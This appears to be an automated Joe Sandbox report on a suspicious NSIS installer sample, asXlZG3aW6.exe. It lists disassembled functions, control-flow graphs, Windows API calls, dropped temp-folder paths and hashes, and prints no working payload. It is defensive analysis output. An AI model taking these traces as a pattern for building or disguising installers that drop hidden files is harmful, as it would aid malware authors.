                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                    • String ID: benevolently Setup: Installing
                                                                                                                                                                                    • API String ID: 3282139019-470378788
                                                                                                                                                                                    • Opcode ID: aa8af9cc06094f93f58c9526d7c11b9f91f5042ecf31170c9ab7365bbcb87e59
                                                                                                                                                                                    • Instruction ID: 825bbfaa6b66e15a56cde4951677423d70b10f791e0768be12abaf391e468a8e
                                                                                                                                                                                    • Opcode Fuzzy Hash: aa8af9cc06094f93f58c9526d7c11b9f91f5042ecf31170c9ab7365bbcb87e59
                                                                                                                                                                                    • Instruction Fuzzy Hash: 80C19F71604205AFDB206F22EE45E2B3EBCFB4570AF40053EFA42B11E1CB7999429B1D
                                                                                                                                                                                    Function 004037B5 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 290 4037b5-4037cd call 4062fd 293 4037e1-403812 call 405e4c 290->293 294 4037cf-4037df call 405ec3 290->294 299 403814-403825 call 405e4c 293->299 300 40382a-403830 lstrcatA 293->300 303 403835-40385e call 403a7a call 4059eb 294->303 299->300 300->303 308 403864-403869 303->308 309 4038e5-4038ed call 4059eb 303->309 308->309 310 40386b-403883 call 405e4c 308->310 315 4038fb-403920 LoadImageA 309->315 316 4038ef-4038f6 call 405f87 309->316 314 403888-40388f 310->314 314->309 317 403891-403893 314->317 319 4039a1-4039a9 call 40140b 315->319 320 403922-403952 RegisterClassA 315->320 316->315 321 4038a4-4038b0 lstrlenA 317->321 322 403895-4038a2 call 405928 317->322 334 4039b3-4039be call 403a7a 319->334 335 4039ab-4039ae 319->335 323 403a70 320->323 324 403958-40399c SystemParametersInfoA CreateWindowExA 320->324 328 4038b2-4038c0 lstrcmpiA 321->328 329 4038d8-4038e0 call 4058fd call 405f65 321->329 322->321 327 403a72-403a79 323->327 324->319 328->329 333 4038c2-4038cc GetFileAttributesA 328->333 329->309 338 4038d2-4038d3 call 405944 333->338 339 4038ce-4038d0 333->339 343 4039c4-4039de ShowWindow call 40628f 334->343 344 403a47-403a48 call 40515e 334->344 335->327 338->329 339->329 339->338 351 4039e0-4039e5 call 40628f 343->351 352 4039ea-4039fc GetClassInfoA 343->352 347 403a4d-403a4f 344->347 349 403a51-403a57 347->349 350 403a69-403a6b call 40140b 347->350 349->335 353 403a5d-403a64 call 40140b 349->353 350->323 351->352 356 403a14-403a37 DialogBoxParamA call 40140b 352->356 357 4039fe-403a0e GetClassInfoA RegisterClassA 352->357 353->335 361 403a3c-403a45 call 403705 356->361 357->356 361->327
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004062FD: GetModuleHandleA.KERNEL32(?,?,?,00403264,0000000A), ref: 0040630F
                                                                                                                                                                                      • Part of subcall function 004062FD: GetProcAddress.KERNEL32(00000000,?), ref: 0040632A
                                                                                                                                                                                    • lstrcatA.KERNEL32(1033,benevolently Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,benevolently Setup: Installing,00000000,00000002,761F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\asXlZG3aW6.exe",00000000), ref: 00403830
                                                                                                                                                                                    • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Ethylamin\Gunocracy243,1033,benevolently Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,benevolently Setup: Installing,00000000,00000002,761F3410), ref: 004038A5
                                                                                                                                                                                    • lstrcmpiA.KERNEL32(?,.exe), ref: 004038B8
                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(Call), ref: 004038C3
                                                                                                                                                                                    • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Ethylamin\Gunocracy243), ref: 0040390C
                                                                                                                                                                                      • Part of subcall function 00405EC3: wsprintfA.USER32 ref: 00405ED0
                                                                                                                                                                                    • RegisterClassA.USER32(0042EBA0), ref: 00403949
                                                                                                                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403961
                                                                                                                                                                                    • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403996
                                                                                                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 004039CC
                                                                                                                                                                                    • GetClassInfoA.USER32(00000000,RichEdit20A,0042EBA0), ref: 004039F8
                                                                                                                                                                                    • GetClassInfoA.USER32(00000000,RichEdit,0042EBA0), ref: 00403A05
                                                                                                                                                                                    • RegisterClassA.USER32(0042EBA0), ref: 00403A0E
                                                                                                                                                                                    • DialogBoxParamA.USER32(?,00000000,00403B52,00000000), ref: 00403A2D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\asXlZG3aW6.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Ethylamin\Gunocracy243$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$benevolently Setup: Installing
                                                                                                                                                                                    • API String ID: 1975747703-1868861650
                                                                                                                                                                                    • Opcode ID: d1b3841e1ff9c87adbcfc9175fdeebf26df0ac974e3d7619a30b9a5d2f2d3a26
                                                                                                                                                                                    • Instruction ID: cf57693f3f88dc886a5042f17341946b18930627488d4c28d640959b633c26bb
                                                                                                                                                                                    • Opcode Fuzzy Hash: d1b3841e1ff9c87adbcfc9175fdeebf26df0ac974e3d7619a30b9a5d2f2d3a26
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E61D770240600AED620BB669D45F373EACEB44749F40447EF985B22E2DB7C9D029A2D
                                                                                                                                                                                    Function 00402D48 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 364 402d48-402d96 GetTickCount GetModuleFileNameA call 405afe 367 402da2-402dd0 call 405f65 call 405944 call 405f65 GetFileSize 364->367 368 402d98-402d9d 364->368 376 402dd6 367->376 377 402ebd-402ecb call 402ce4 367->377 369 402f7a-402f7e 368->369 378 402ddb-402df2 376->378 383 402f20-402f25 377->383 384 402ecd-402ed0 377->384 381 402df4 378->381 382 402df6-402dff call 403193 378->382 381->382 390 402e05-402e0c 382->390 391 402f27-402f2f call 402ce4 382->391 383->369 386 402ed2-402eea call 4031a9 call 403193 384->386 387 402ef4-402f1e GlobalAlloc call 4031a9 call 402f81 384->387 386->383 410 402eec-402ef2 386->410 387->383 415 402f31-402f42 387->415 394 402e88-402e8c 390->394 395 402e0e-402e22 call 405ab9 390->395 391->383 400 402e96-402e9c 394->400 401 402e8e-402e95 call 402ce4 394->401 395->400 413 402e24-402e2b 395->413 406 402eab-402eb5 400->406 407 402e9e-402ea8 call 4063b4 400->407 401->400 406->378 414 402ebb 406->414 407->406 410->383 410->387 413->400 419 402e2d-402e34 413->419 414->377 416 402f44 415->416 417 402f4a-402f4f 415->417 416->417 420 402f50-402f56 417->420 419->400 421 402e36-402e3d 419->421 420->420 422 402f58-402f73 SetFilePointer call 405ab9 420->422 421->400 423 402e3f-402e46 421->423 427 402f78 422->427 423->400 425 402e48-402e68 423->425 425->383 426 402e6e-402e72 425->426 428 402e74-402e78 426->428 429 402e7a-402e82 426->429 427->369 428->414 428->429 429->400 430 402e84-402e86 429->430 430->400
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402D59
                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\asXlZG3aW6.exe,00000400), ref: 00402D75
                                                                                                                                                                                      • Part of subcall function 00405AFE: GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\asXlZG3aW6.exe,80000000,00000003), ref: 00405B02
                                                                                                                                                                                      • Part of subcall function 00405AFE: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B24
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\asXlZG3aW6.exe,C:\Users\user\Desktop\asXlZG3aW6.exe,80000000,00000003), ref: 00402DC1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Error launching installer, xrefs: 00402D98
                                                                                                                                                                                    • Inst, xrefs: 00402E2D
                                                                                                                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F20
                                                                                                                                                                                    • soft, xrefs: 00402E36
                                                                                                                                                                                    • "C:\Users\user\Desktop\asXlZG3aW6.exe", xrefs: 00402D48
                                                                                                                                                                                    • C:\Users\user\Desktop, xrefs: 00402DA3, 00402DA8, 00402DAE
                                                                                                                                                                                    • Null, xrefs: 00402E3F
                                                                                                                                                                                    • C:\Users\user\Desktop\asXlZG3aW6.exe, xrefs: 00402D5F, 00402D6E, 00402D82, 00402DA2
                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00402D4F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\asXlZG3aW6.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\asXlZG3aW6.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                                                                                    • API String ID: 4283519449-1047360279
                                                                                                                                                                                    • Opcode ID: 7ea76b1eabee36cc462c4becf9ee5f087804ecb308710c36f18c8c35563ccf84
                                                                                                                                                                                    • Instruction ID: b7ea9236aecaa86e611592eb70b2ed5589fa10121b1bd9207fea2451aa196312
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ea76b1eabee36cc462c4becf9ee5f087804ecb308710c36f18c8c35563ccf84
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D51F431A00215ABDB20AF64DE89B9F7BB8FB14358F50413BE504B72D1C7B88D858B9C
                                                                                                                                                                                    Function 00405F87 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 199stringCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 431 405f87-405f92 432 405f94-405fa3 431->432 433 405fa5-405fbb 431->433 432->433 434 405fc1-405fcc 433->434 435 4061ac-4061b0 433->435 434->435 436 405fd2-405fd9 434->436 437 4061b6-4061c0 435->437 438 405fde-405fe8 435->438 436->435 440 4061c2-4061c6 call 405f65 437->440 441 4061cb-4061cc 437->441 438->437 439 405fee-405ff5 438->439 442 405ffb-40602f 439->442 443 40619f 439->443 440->441 445 406035-40603f 442->445 446 40614c-40614f 442->446 447 4061a1-4061a7 443->447 448 4061a9-4061ab 443->448 449 406041-406045 445->449 450 406059 445->450 451 406151-406154 446->451 452 40617f-406182 446->452 447->435 448->435 449->450 456 406047-40604b 449->456 453 406060-406067 450->453 457 406164-406170 call 405f65 451->457 458 406156-406162 call 405ec3 451->458 454 406190-40619d lstrlenA 452->454 455 406184-40618b call 405f87 452->455 459 406069-40606b 453->459 460 40606c-40606e 453->460 454->435 455->454 456->450 463 40604d-406051 456->463 468 406175-40617b 457->468 458->468 459->460 466 406070-406093 call 405e4c 460->466 467 4060a7-4060aa 460->467 463->450 469 406053-406057 463->469 479 406133-406137 466->479 480 406099-4060a2 call 405f87 466->480 472 4060ba-4060bd 467->472 473 4060ac-4060b8 GetSystemDirectoryA 467->473 468->454 471 40617d 468->471 469->453 475 406144-40614a call 4061cf 471->475 477 40612a-40612c 472->477 478 4060bf-4060cd GetWindowsDirectoryA 472->478 476 40612e-406131 473->476 475->454 476->475 476->479 477->476 481 4060cf-4060d9 477->481 478->477 479->475 484 406139-40613f lstrcatA 479->484 480->476 486 4060f3-406109 SHGetSpecialFolderLocation 481->486 487 4060db-4060de 481->487 484->475 488 406127 486->488 489 40610b-406125 SHGetPathFromIDListA CoTaskMemFree 486->489 487->486 491 4060e0-4060e7 487->491 488->477 489->476 489->488 492 4060ef-4060f1 491->492 492->476 492->486
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 004060B2
                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,00000000,004050C4,Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,00000000), ref: 004060C5
                                                                                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(004050C4,761F23A0,?,Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,00000000,004050C4,Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,00000000), ref: 00406101
                                                                                                                                                                                    • SHGetPathFromIDListA.SHELL32(761F23A0,Call), ref: 0040610F
                                                                                                                                                                                    • CoTaskMemFree.OLE32(761F23A0), ref: 0040611B
                                                                                                                                                                                    • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040613F
                                                                                                                                                                                    • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,00000000,004050C4,Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,00000000,00000000,0041AE28,761F23A0), ref: 00406191
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                    • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                    • API String ID: 717251189-339270173
                                                                                                                                                                                    • Opcode ID: c25c6e587ef3fde48e93a35018af7a99bc0d725d9e60a3ed05427843a892e885
                                                                                                                                                                                    • Instruction ID: 1b13e8ff18f2312f61c88a614d7ce51b6c0fc9f7833a06fa9902b6248b39176d
                                                                                                                                                                                    • Opcode Fuzzy Hash: c25c6e587ef3fde48e93a35018af7a99bc0d725d9e60a3ed05427843a892e885
                                                                                                                                                                                    • Instruction Fuzzy Hash: D561F170A00105AEDF20AF24CC90BBB3BA5EB55314F56413FE903BA2D2C67D4962CB5E
                                                                                                                                                                                    Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 562 401759-40177c call 402ac1 call 40596a 567 401786-401798 call 405f65 call 4058fd lstrcatA 562->567 568 40177e-401784 call 405f65 562->568 573 40179d-4017a3 call 4061cf 567->573 568->573 578 4017a8-4017ac 573->578 579 4017ae-4017b8 call 406268 578->579 580 4017df-4017e2 578->580 587 4017ca-4017dc 579->587 588 4017ba-4017c8 CompareFileTime 579->588 581 4017e4-4017e5 call 405ad9 580->581 582 4017ea-401806 call 405afe 580->582 581->582 590 401808-40180b 582->590 591 40187e-4018a7 call 40508c call 402f81 582->591 587->580 588->587 592 401860-40186a call 40508c 590->592 593 40180d-40184f call 405f65 * 2 call 405f87 call 405f65 call 405681 590->593 603 4018a9-4018ad 591->603 604 4018af-4018bb SetFileTime 591->604 605 401873-401879 592->605 593->578 625 401855-401856 593->625 603->604 607 4018c1-4018cc CloseHandle 603->607 604->607 608 40295a 605->608 611 402951-402954 607->611 612 4018d2-4018d5 607->612 613 40295c-402960 608->613 611->608 615 4018d7-4018e8 call 405f87 lstrcatA 612->615 616 4018ea-4018ed call 405f87 612->616 622 4018f2-4022e6 call 405681 615->622 616->622 622->613 625->605 627 401858-401859 625->627 627->592
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\Ethylamin\Gunocracy243\knejse\Trifliernes,00000000,00000000,00000031), ref: 00401798
                                                                                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\Ethylamin\Gunocracy243\knejse\Trifliernes,00000000,00000000,00000031), ref: 004017C2
                                                                                                                                                                                      • Part of subcall function 00405F65: lstrcpynA.KERNEL32(?,?,00000400,004032C3,benevolently Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F72
                                                                                                                                                                                      • Part of subcall function 0040508C: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,00000000,0041AE28,761F23A0,?,?,?,?,?,?,?,?,?,004030DC,00000000,?), ref: 004050C5
                                                                                                                                                                                      • Part of subcall function 0040508C: lstrlenA.KERNEL32(004030DC,Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,00000000,0041AE28,761F23A0,?,?,?,?,?,?,?,?,?,004030DC,00000000), ref: 004050D5
                                                                                                                                                                                      • Part of subcall function 0040508C: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,004030DC,004030DC,Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,00000000,0041AE28,761F23A0), ref: 004050E8
                                                                                                                                                                                      • Part of subcall function 0040508C: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll), ref: 004050FA
                                                                                                                                                                                      • Part of subcall function 0040508C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405120
                                                                                                                                                                                      • Part of subcall function 0040508C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513A
                                                                                                                                                                                      • Part of subcall function 0040508C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405148
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\Ethylamin\Gunocracy243\knejse\Trifliernes$C:\Users\user\AppData\Local\Temp\nsa33B1.tmp$C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll$Call
                                                                                                                                                                                    • API String ID: 1941528284-418975303
                                                                                                                                                                                    • Opcode ID: 4811c27f678321775648cb42fdf4a010893550d1e61fc14233a6adfccbf9552d
                                                                                                                                                                                    • Instruction ID: 024705dcfdf044f05b4b82656432081f20986447a00b4521f0a60d415ab43704
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4811c27f678321775648cb42fdf4a010893550d1e61fc14233a6adfccbf9552d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4841B431A04515BECB107BB58C45EAF3679EF05369F60833BF421F20E1D67C89428A6D
                                                                                                                                                                                    Function 00402F81 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 166COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 629 402f81-402f95 630 402f97 629->630 631 402f9e-402fa7 629->631 630->631 632 402fb0-402fb5 631->632 633 402fa9 631->633 634 402fc5-402fd2 call 403193 632->634 635 402fb7-402fc0 call 4031a9 632->635 633->632 639 403181 634->639 640 402fd8-402fdc 634->640 635->634 641 403183-403184 639->641 642 402fe2-40302b GetTickCount 640->642 643 40312c-40312e 640->643 646 40318c-403190 641->646 647 403031-403039 642->647 648 403189 642->648 644 403130-403133 643->644 645 40316e-403171 643->645 644->648 651 403135 644->651 649 403173 645->649 650 403176-40317f call 403193 645->650 652 40303b 647->652 653 40303e-40304c call 403193 647->653 648->646 649->650 650->639 663 403186 650->663 656 403138-40313e 651->656 652->653 653->639 662 403052-40305b 653->662 659 403140 656->659 660 403142-403150 call 403193 656->660 659->660 660->639 666 403152-40315e call 405ba5 660->666 665 403061-403081 call 406422 662->665 663->648 671 403124-403126 665->671 672 403087-40309a GetTickCount 665->672 673 403160-40316a 666->673 674 403128-40312a 666->674 671->641 675 40309c-4030a4 672->675 676 4030df-4030e1 672->676 673->656 677 40316c 673->677 674->641 678 4030a6-4030aa 675->678 679 4030ac-4030dc MulDiv wsprintfA call 40508c 675->679 680 4030e3-4030e7 676->680 681 403118-40311c 676->681 677->648 678->676 678->679 679->676 684 4030e9-4030f0 call 405ba5 680->684 685 4030fe-403109 680->685 681->647 682 403122 681->682 682->648 689 4030f5-4030f7 684->689 687 40310c-403110 685->687 687->665 690 403116 687->690 689->674 691 4030f9-4030fc 689->691 690->648 691->687
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CountTick$wsprintf
                                                                                                                                                                                    • String ID: (TA$(TA$... %d%%$W`A
                                                                                                                                                                                    • API String ID: 551687249-3157881336
                                                                                                                                                                                    • Opcode ID: 46c4353731e2246c325a5ee8fa82e7dbf3443aa0b1f18f7fec91e964ca525be6
